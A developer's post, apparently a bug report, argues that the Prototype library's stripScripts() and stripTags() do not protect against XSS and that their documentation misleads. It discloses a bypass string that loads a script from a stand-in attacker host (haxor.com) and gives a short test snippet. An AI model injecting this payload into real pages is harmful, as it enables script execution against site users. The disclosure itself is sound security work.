Prototype

I recently encountered a case where a developer thought he would be safe by running stripScripts().stripTags() on his strings before inserting them in the DOM.

However, these function use very simple regexes, and most importantly will let a few < or > out. For instance you can trick stripScripts().scriptTags() with the string "</<script src=http://haxor.com/owned.js" (without the double quotes), which Firefox 2 will happily execute. Test with:

var txt = '</<script src=http://haxor.com/owned.js';
if ( txt == txt.stripScripts().stripTags() ) alert('XSS passed thru');

IMHO it will be quite complicated to properly handle all flavours of tag soups which will be greedily interpreted by the major browsers. And a regex might not be up to the job.

I guess a proper solution would be to notify stripScripts() and stripTags() users in the documentation that these method only try to do their best, and that the output must not be trusted since it may contains < and > characters.

The current documentation (1.6.0.2) does not pretend that stripping is actually a security measure (it's an aesthetic one IMHO), it does not mention security at all. But in my experience, many programmers feel they are XSS-safe as soon as they see the magical "strip" word (though they should think "escape").

As for now, Strips a string of anything that looks like an HTML script block and Strips a string of any HTML tag is actually untrue and misleading.